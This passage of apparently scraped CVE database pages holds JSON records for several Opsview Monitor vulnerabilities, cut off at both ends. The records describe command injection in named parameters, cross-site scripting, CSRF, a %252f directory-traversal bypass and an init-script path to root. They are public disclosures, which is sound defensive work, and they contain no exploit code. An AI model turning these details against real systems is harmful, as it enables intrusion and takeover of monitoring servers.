"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The web management console of Opsview Monitor 5.4.x before 5.4.2 provides functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The value parameter is not properly sanitized, leading to arbitrary command injection with the privileges of the nagios user account."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16146",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The web management console of Opsview Monitor 5.4.x before 5.4.2 provides functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The value parameter is not properly sanitized, leading to arbitrary command injection with the privileges of the nagios user account."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16146",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:37.835Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16144 (GCVE-0-2018-16144)
Vulnerability from cvelistv5 – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17- n/a
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:37.656Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The test connection functionality in the NetAudit section of Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to command injection due to improper sanitization of the rancid_password parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16144",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The test connection functionality in the NetAudit section of Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to command injection due to improper sanitization of the rancid_password parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"name": "https://knowledge.opsview.com/v5.3/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16144",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:37.656Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16148 (GCVE-0-2018-16148)
Vulnerability from cvelistv5 – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17- n/a
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:38.353Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The diagnosticsb2ksy parameter of the /rest endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16148",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The diagnosticsb2ksy parameter of the /rest endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"name": "https://knowledge.opsview.com/v5.3/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16148",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:38.353Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-10367 (GCVE-0-2016-10367)
Vulnerability from cvelistv5 – Published: 2017-05-03 10:00 – Updated: 2024-09-16 19:19- n/a
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T03:21:51.348Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In Opsview Monitor Pro (Prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch), an unauthenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple URL encoding bypass, %252f instead of /."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-05-03T10:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-10367",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "In Opsview Monitor Pro (Prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch), an unauthenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple URL encoding bypass, %252f instead of /."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341",
"refsource": "MISC",
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-10367",
"datePublished": "2017-05-03T10:00:00Z",
"dateReserved": "2017-05-03T00:00:00Z",
"dateUpdated": "2024-09-16T19:19:27.272Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-3935 (GCVE-0-2013-3935)
Vulnerability from nvd – Published: 2020-01-02 14:31 – Updated: 2024-08-06 16:22- Cross-Site Request Forgery
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Opsview | Opsview |
Affected:
before 4.4.1
|
|||||||
|
|||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:22:01.472Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Opsview",
"vendor": "Opsview",
"versions": [
{
"status": "affected",
"version": "before 4.4.1"
}
]
},
{
"product": "Opsview Core",
"vendor": "Opsview",
"versions": [
{
"status": "affected",
"version": "before 20130522"
}
]
}
],
"datePublic": "2013-10-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Cross-site request forgery (CSRF) vulnerability in Opsview before 4.4.1 and Opsview Core before 20130522 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Cross-Site Request Forgery ",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-02T14:31:52",
"orgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"shortName": "flexera"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "PSIRT-CNA@flexerasoftware.com",
"ID": "CVE-2013-3935",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Opsview",
"version": {
"version_data": [
{
"version_value": "before 4.4.1"
}
]
}
},
{
"product_name": "Opsview Core",
"version": {
"version_data": [
{
"version_value": "before 20130522"
}
]
}
}
]
},
"vendor_name": "Opsview"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site request forgery (CSRF) vulnerability in Opsview before 4.4.1 and Opsview Core before 20130522 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Cross-Site Request Forgery "
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes",
"refsource": "MISC",
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"name": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822",
"refsource": "MISC",
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"assignerShortName": "flexera",
"cveId": "CVE-2013-3935",
"datePublished": "2020-01-02T14:31:52",
"dateReserved": "2013-06-04T00:00:00",
"dateUpdated": "2024-08-06T16:22:01.472Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-3936 (GCVE-0-2013-3936)
Vulnerability from nvd – Published: 2020-01-02 14:31 – Updated: 2024-08-06 16:30- Cross-Site Scripting
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Opsview | Opsview |
Affected:
before 4.4.1
|
|||||||
|
|||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:30:48.701Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Opsview",
"vendor": "Opsview",
"versions": [
{
"status": "affected",
"version": "before 4.4.1"
}
]
},
{
"product": "Opsview Core",
"vendor": "Opsview",
"versions": [
{
"status": "affected",
"version": "before 20130522"
}
]
}
],
"datePublic": "2013-10-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Opsview before 4.4.1 and Opsview Core before 20130522 allow remote attackers to inject arbitrary web script or HTML."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Cross-Site Scripting",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-02T14:31:49",
"orgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"shortName": "flexera"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "PSIRT-CNA@flexerasoftware.com",
"ID": "CVE-2013-3936",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Opsview",
"version": {
"version_data": [
{
"version_value": "before 4.4.1"
}
]
}
},
{
"product_name": "Opsview Core",
"version": {
"version_data": [
{
"version_value": "before 20130522"
}
]
}
}
]
},
"vendor_name": "Opsview"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Opsview before 4.4.1 and Opsview Core before 20130522 allow remote attackers to inject arbitrary web script or HTML."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Cross-Site Scripting"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes",
"refsource": "MISC",
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"name": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822",
"refsource": "MISC",
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"assignerShortName": "flexera",
"cveId": "CVE-2013-3936",
"datePublished": "2020-01-02T14:31:49",
"dateReserved": "2013-06-04T00:00:00",
"dateUpdated": "2024-08-06T16:30:48.701Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16145 (GCVE-0-2018-16145)
Vulnerability from nvd – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17- n/a
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:38.184Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The /etc/init.d/opsview-reporting-module script that runs at boot time in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 invokes a file that can be edited by the nagios user, and would allow attackers to elevate their privileges to root after a system restart, hence obtaining full control of the appliance."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16145",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The /etc/init.d/opsview-reporting-module script that runs at boot time in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 invokes a file that can be edited by the nagios user, and would allow attackers to elevate their privileges to root after a system restart, hence obtaining full control of the appliance."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"name": "https://knowledge.opsview.com/v5.3/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16145",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:38.184Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16147 (GCVE-0-2018-16147)
Vulnerability from nvd – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17- n/a
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:37.631Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The data parameter of the /settings/api/router endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16147",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
